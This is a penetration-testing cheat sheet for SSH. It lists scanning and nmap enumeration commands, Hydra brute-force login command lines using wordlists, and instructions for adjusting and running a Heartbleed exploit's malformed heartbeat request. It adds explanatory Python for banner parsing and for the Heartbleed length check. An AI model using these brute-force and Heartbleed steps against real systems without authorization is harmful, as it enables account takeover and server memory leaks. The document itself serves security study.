SSH (22)
1. Scanning
Banner Grabbing - nc -vn <IP> 22
Initiate Connection - ssh <username>@<IP> [-p <port>]
Retrieve the server's host public keys - ssh-keyscan -t rsa <IP> [-p <port>] (use -t rsa,ecdsa,ed25519 to collect every key type the server offers)
DNS enumeration of the target domain (not SSH-specific) -
dnsrecon -d <domain_name> -n <IP>
dnsenum <domain_name>
Audit the SSH server's version and configuration (key exchange, cipher and MAC algorithms) - ssh-audit -v <IP>
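The banner grabbed with nc above is the SSH identification string from RFC 4253 section 4.2 (SSH-protoversion-softwareversion SP comments). The following is an added example, not code from the original page: it reads that line from a socket the same way nc does and parses it, pulling out the OpenSSH version number and flagging servers whose protocol version (1.x or 1.99) still accepts SSH-1. The sample banners are constructed for the example, not captured from any real host.

```python
"""Added example: grab and parse an SSH identification string (RFC 4253 s4.2).
Not part of the original page; sample banners below are constructed."""
import re
import socket

# SSH-protoversion-softwareversion [SP comments], e.g. SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5
BANNER_RE = re.compile(r"^SSH-(?P<proto>\d+\.\d+)-(?P<software>\S+)(?: (?P<comments>.*))?$")
OPENSSH_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)")


def parse_ssh_banner(line: str) -> dict:
    """Split an identification string into its parts.

    Raises ValueError for anything that is not an SSH identification string
    (servers may legitimately send other lines before it; callers skip those).
    """
    m = BANNER_RE.match(line.rstrip("\r\n"))
    if not m:
        raise ValueError(f"not an SSH identification string: {line!r}")
    info = m.groupdict()
    # Protocol version 1.x is SSH-1 only; 1.99 means the server speaks both
    # SSH-1 and SSH-2. Either way SSH-1 is still accepted, which is a finding.
    info["ssh1_compatible"] = info["proto"].startswith("1.")
    # OpenSSH reports itself as OpenSSH_<major>.<minor>p<patch>; keep the
    # numeric part as a tuple so it can be compared against a baseline.
    ov = OPENSSH_RE.match(info["software"])
    info["openssh_version"] = (int(ov.group(1)), int(ov.group(2))) if ov else None
    return info


def grab_ssh_banner(host: str, port: int = 22, timeout: float = 5.0) -> str:
    """Network equivalent of 'nc -vn <IP> 22': the server speaks first, so read
    lines until the one starting with SSH- arrives and return it."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        for raw in s.makefile("rb"):
            line = raw.decode("utf-8", "replace")
            if line.startswith("SSH-"):
                return line.rstrip("\r\n")
    raise ValueError("connection closed before an SSH identification string")


# Constructed sample banners (not captured from any real host).
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5",
    "SSH-2.0-OpenSSH_7.4",
    "SSH-1.99-Cisco-1.25",
]

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(parse_ssh_banner(banner))
```

Against a live target, call grab_ssh_banner(host, port) and feed the result to parse_ssh_banner; the comments field is where distributions put their package revision (Ubuntu-4ubuntu0.5 above), which is what tools such as ssh-audit use to look up backported fixes.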
2. Enumeration
Default nmap scripts for SSH - nmap -sC -p<port> <IP>
Retrieve version - nmap -sV -p<port> <IP>
Retrieve supported algorithms (key exchange, host key, cipher, MAC) -
nmap --script ssh2-enum-algos -p<port> <IP>
Retrieve host keys with the full public key printed -
nmap --script ssh-hostkey --script-args ssh_hostkey=full -p<port> <IP>
Check authentication methods -
nmap --script ssh-auth-methods --script-args="ssh.user=root" -p<port> <IP>
3. Hydra
hydra -l <username> -p <password> -s <port number> ssh://<target ip address>
hydra -l <username> -P <wordlist> -s <port number> ssh://<target ip address>
hydra -L <username list> -P <wordlist> -s <port number> ssh://<target ip address>
hydra -L <username list> -p <password> -s <port number> ssh://<target ip address>
Keep parallel tasks low (-t 4 or fewer): sshd's MaxStartups throttles concurrent unauthenticated connections, and hydra itself warns about this for the ssh module.
4. HeartBleed.py (TLS, not SSH: Heartbleed, CVE-2014-0160, is the OpenSSL heartbeat over-read and affects TLS services such as 443; it does not apply to an SSH daemon)
Areas to modify - the heartbeat request builder. Only the 2-byte claimed payload length needs changing; the record length stays 3 because only the type byte and the length field are actually sent. A vulnerable server trusts the claimed length and echoes that many bytes of process memory.
Original (claims 0x4000 = 16384 bytes):
def build_heartbeat(tls_ver):
    heartbeat = [
        0x18,           # Content Type (Heartbeat)
        0x03, tls_ver,  # TLS version (minor byte: 0x01 = 1.0, 0x02 = 1.1, 0x03 = 1.2)
        0x00, 0x03,     # Record length: 3 bytes actually follow (type + 2-byte length)
        # Payload
        0x01,           # Type (Request)
        0x40, 0x00      # Claimed payload length (0x4000 = 16384)  # Modify this
    ]
    return heartbeat
Modified (claims 0x1000 = 4096 bytes per request):
def build_heartbeat(tls_ver):
    heartbeat = [
        0x18,           # Content Type (Heartbeat)
        0x03, tls_ver,  # TLS version
        0x00, 0x03,     # Record length (unchanged: still only 3 bytes follow)
        # Payload
        0x01,           # Type (Request)
        0x10, 0x00      # Claimed payload length (0x1000 = 4096)  # Modify this
    ]
    return heartbeat
To run
Default Execution - python heartbleed.py <IP>
Include Hexdump in output - python heartbleed.py -x <IP>
Repeated run - python heartbleed.py -n <count> <IP>
# Filter output for interesting keywords
# Remember to enumerate other services while this runs
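The modification above works because the record-level length (3) and the claimed payload length (0x4000 or 0x1000) disagree. The following is an added example, not the page's heartbleed.py: a parametrised builder that produces the same bytes as the two versions above, a parser that reports how many bytes a server trusting the claimed length would leak, and the bounds check the fixed OpenSSL applies (1 + 2 + payload_length + 16 bytes of minimum padding must fit in the record). All records are built in memory; nothing is sent to a network.

```python
"""Added example: build/parse TLS heartbeat records to show the Heartbleed
length mismatch. Not the original page's script; constructed data only."""
import struct

HEARTBEAT_CONTENT_TYPE = 0x18
HEARTBEAT_REQUEST = 0x01
MIN_PADDING = 16  # RFC 6520 requires at least 16 bytes of padding


def build_heartbeat(tls_ver: int, claimed_len: int = 0x4000, padding: bytes = b"") -> bytes:
    """Build a heartbeat record. tls_ver is the TLS minor version byte
    (0x01 = 1.0, 0x02 = 1.1, 0x03 = 1.2). The record length is what actually
    follows; claimed_len is what the HeartbeatMessage header asserts. Leaving
    the two inconsistent (default: 3 vs 16384) reproduces the over-read request."""
    body = struct.pack("!BH", HEARTBEAT_REQUEST, claimed_len) + padding
    return struct.pack("!BBBH", HEARTBEAT_CONTENT_TYPE, 0x03, tls_ver, len(body)) + body


def overread_bytes(record: bytes) -> int:
    """Return how many bytes beyond the received payload a server that trusts
    payload_length (unpatched OpenSSL) would copy into its reply; 0 if consistent."""
    ctype, _major, _minor, rec_len = struct.unpack("!BBBH", record[:5])
    if ctype != HEARTBEAT_CONTENT_TYPE:
        raise ValueError("not a heartbeat record")
    body = record[5:5 + rec_len]
    _hb_type, claimed_len = struct.unpack("!BH", body[:3])
    actual_payload = len(body) - 3  # bytes after the type and length fields
    return max(claimed_len - actual_payload, 0)


def heartbeat_record_is_safe(record: bytes) -> bool:
    """The check added in the OpenSSL fix: type (1) + length (2) + claimed
    payload + minimum padding must fit inside the record, else discard it."""
    rec_len = struct.unpack("!H", record[3:5])[0]
    claimed_len = struct.unpack("!H", record[6:8])[0]
    return 1 + 2 + claimed_len + MIN_PADDING <= rec_len


if __name__ == "__main__":
    for claimed in (0x4000, 0x1000):
        rec = build_heartbeat(0x03, claimed)
        print(rec.hex(), "over-read:", overread_bytes(rec), "safe:", heartbeat_record_is_safe(rec))
    ok = build_heartbeat(0x03, 4, b"ABCD" + b"\x00" * MIN_PADDING)
    print(ok.hex(), "over-read:", overread_bytes(ok), "safe:", heartbeat_record_is_safe(ok))
```

build_heartbeat(0x03) yields exactly the eight bytes of the original list, and build_heartbeat(0x03, 0x1000) the modified one; a patched server discards both, while a well-formed request (claimed length matching the bytes sent, plus padding) passes the check.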